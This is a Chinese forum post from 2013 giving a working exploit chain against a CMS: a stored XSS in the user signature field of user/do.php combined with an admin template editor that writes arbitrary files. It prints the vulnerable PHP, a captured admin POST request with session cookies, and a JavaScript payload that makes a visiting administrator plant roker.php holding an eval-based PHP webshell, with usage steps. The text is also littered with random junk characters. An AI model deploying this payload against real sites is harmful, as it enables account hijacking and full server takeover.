|
|
这个cms 以前 90有人发了个getshell,当时 是后台验证文件的问题0 t7 q. b% K4 s/ B& R3 ~
官网已经修补了,所以重新下了源码
) Q$ L5 a: f' D) g/ F# d因为 后台登入 还需要认证码 所以 注入就没看了。
/ q) z, M, {4 ?/ C. ]0 L2 t存在 xss+ l( f; i+ E) n
漏洞文件 user/member/skin_edit.php
! {4 r( n+ a: e: h, D! k1 ~) u本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:1 S& b @: o2 |+ g' K/ f# p
0 V' x/ c) g2 t; k2 L. x
</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>
+ x1 m# d$ \$ X 7 g8 q+ P9 C1 |" R& f Q
</textarea></td></tr>! H# N8 R2 N; J: v4 X; B! F. @2 ?" F
9 H5 `3 u0 e0 h3 ^
user/do.php 2 Y; x9 R7 D- Y
% u: P: a# d, A) y
# L# ?# M! c5 d# T" C+ z0 Y
if($op=='zl'){ //资料, Z& S0 ?7 W3 j& n3 _
* S' O5 L) U( C/ s1 z if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email))
! R3 g! t, f; m( x exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));% _& m( D. _2 m2 F5 r9 G+ ^
0 ?! d- S1 t8 k5 A6 T
$sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',$ U9 A, J( H) ^* a2 r/ i X# X
& K9 |1 [: p* a& U
CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'
! b) @$ Y% g# |6 R3 I/ h+ k where CS_Name='".$cscms_name."'";
% C3 a" V+ y0 V1 U) I( ] $ U, z' ~0 j: D0 h+ T% u! E X
if($db->query($sql)){9 l- O9 d) }9 d3 U2 w7 j7 k, n
1 h0 L) V5 r) |5 I3 }8 `
exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));- z9 Y, `3 X0 n* x
$ h0 @& _6 l$ b& h& q5 @
}else{$ }3 M; \! j8 y/ ?# b. @0 }
5 P" _; Y7 n: m) H- S6 k0 \ exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));
0 l/ _/ z4 k! f; v3 ^- G$ M) z* u % T3 Q9 _* c% z- o$ R
}
5 R0 a a6 c9 J
- _6 @ u6 m; t+ t1 R: U5 r7 t' l( e# X
没有 过滤导致xss产生。
" X( ~6 j$ h- Y, w" p后台 看了下 很奇葩的是可以写任意格式文件。。' v$ j% \/ `3 J/ X( j
抓包。。
5 r- N f2 I( O8 r
4 k+ A4 _5 ]" t8 x* u
: s2 P9 F4 J3 g# c( H9 |5 n本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.14 A) B+ R9 j$ A0 K* x6 O
( T' t: v: T" w7 e
Accept: text/html, application/xhtml+xml, */*& X- U" R. W) P P$ W. l1 e
( ]! r( w, B7 u# [, @
Referer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php
4 x/ _- Q0 R) E
. r$ t7 D- N3 g9 O9 B- U3 tAccept-Language: zh-CN
' A4 w* r! y: \. E4 o/ x. [
; x( _5 X6 Q6 u. NUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
1 {* q6 b; y- @, V* S2 n2 t9 H# x # ]0 \/ S3 _2 }- P* _5 ^5 a3 F
Content-Type: application/x-www-form-urlencoded
# b7 K( I: R3 T' E- } 9 C2 Q% j8 g0 a) y+ }
Accept-Encoding: gzip, deflate2 p" f* Q4 W# _% p
1 ^, d/ I2 e N# a
Host: 127.0.0.1& |0 Q/ x' e1 P3 ~) j! T7 |
* B0 K% `; H/ L0 g0 H9 o
Content-Length: 38
7 f9 ^! f$ b1 S" [8 x 1 j- B1 O$ k( |# t# M
DNT: 1
' T. P5 x N; I# ^ - r/ c. `$ h: Y; T( n& z
Connection: Keep-Alive
# O, e2 i# w" A' N' S4 O" R
& L) ^( [1 c% S: m/ BCache-Control: no-cache5 X. C+ R) ~ F9 B
' E, s2 O5 s4 E/ F
Cookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594
1 e5 f) P$ @* s7 A. O: z
& X9 b Z) d' e0 V: t, {
! v5 S {9 N9 w8 z1 Tname=aaa.php&content=%3Cs%3E%3Ca%25%3E
9 M8 W5 a5 N, r4 P7 P2 j! D* F; [
7 s4 P5 r }4 m. s/ k
- |- ~) e C: v6 o
6 v/ G4 w$ v/ A/ @7 u于是 构造js如下。
% U s) v1 S3 `0 e' g8 R* K, f L {' _# z9 M4 y& j' K
本帖隐藏的内容<script>
2 G. G/ a- G' ^8 u7 bthisTHost = top.location.hostname;1 v( L b$ X& _5 I
! @0 C" Q0 }( X/ R: l4 `. w& J7 EthisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";# {& o m' M' ]% K- t
. g2 G5 f6 e$ f1 b" v9 I6 T- }function PostSubmit(url, data, msg) { 5 v& m9 R j/ C3 H9 B+ w7 @4 L
var postUrl = url;1 k* l3 [; X( I$ `8 U6 {3 U4 T
$ `9 [2 @" i% @: X, N- y1 n5 W! d var postData = data; 8 S7 R* e2 {0 o6 b/ p' u
var msgData = msg; " i& }; p# a6 Y$ D& i
var ExportForm = document.createElement("FORM");
, j5 t: n2 S' R5 x* Q document.body.appendChild(ExportForm);
' a4 r, I8 k# j1 r ExportForm.method = "POST"; : J n+ K9 H6 p% [) y" G
var newElement = document.createElement("input");
0 v6 \4 F/ h+ G* A7 |% s* m1 ? newElement.setAttribute("name", "name"); / e; ?, i9 N6 r; i# e. U% ^0 Z. G3 _
newElement.setAttribute("type", "hidden");
& M6 Y3 Y' W0 _7 S3 M. C9 q var newElement2 = document.createElement("input"); 2 v/ g: H/ G7 ^5 ?7 r+ ~, l
newElement2.setAttribute("name", "content"); 7 S0 [* B/ y# V) V
newElement2.setAttribute("type", "hidden");
# L2 K+ G6 z/ P; ~: D, W2 e ExportForm.appendChild(newElement); 9 ^! M1 v- \, |; X9 j+ U- l( \
ExportForm.appendChild(newElement2); 1 A% e" R6 L t6 S! ~
newElement.value = postData;
8 M7 U. b( f. c( O4 Z; C$ ? newElement2.value = msgData;
- ~5 Q+ P& C9 \: D* f ExportForm.action = postUrl; 3 p$ o% }4 X2 U7 c. Q. G
ExportForm.submit(); % S. m7 P3 S. o" G
};
) g, ?# n! }/ ~8 U, K. R 8 Q- }4 ]- x6 r
PostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");
+ o- V: K4 f( ]0 g' W7 r / I9 i X" B: O3 X& d% J. u& ~# a
</script>3 Q$ F3 u# H' a
5 @1 Y7 W! V) ~& U) E9 t7 A- G( c' `
8 e0 V, ^- x% p8 Lhttp://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入; y' z: G F2 I1 r S7 t( L8 C
用你的账号给管理写个 私信 或者让他访问 你的主页http://127.0.0.1/home/?uid=2(uid自己改)6 d* F6 b/ n9 u v9 d5 a! O
就会 在 skins\index\html\目录下生成 roker.php 一句话。 |
" S2 |2 c- Q e* M) {
|
|
发表于 2013-11-6 18:09:37
收藏
支持
反对